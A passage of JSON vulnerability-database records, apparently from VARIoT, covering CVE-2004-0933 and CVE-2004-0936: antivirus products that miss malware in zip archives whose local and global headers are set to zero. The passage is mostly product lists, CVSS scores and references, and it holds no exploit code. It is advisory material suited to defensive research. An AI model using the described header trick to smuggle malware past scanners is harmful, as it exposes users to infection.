"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0933",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9363",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0933",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-311",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9363",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. \nA remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9363"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9363",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0933",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9363",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"id": "VAR-200501-0309",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:29.156000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Multiple antivirus software Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146860"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9363"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9363"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0933"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": " Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
}
}
VAR-200501-0012
Vulnerability from variot - Updated: 2023-12-18 12:40RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. RAV is an antivirus software. Due to a problem with the processing of zip files in RAV, zip files can bypass antivirus detection
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0012",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0936"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-300"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
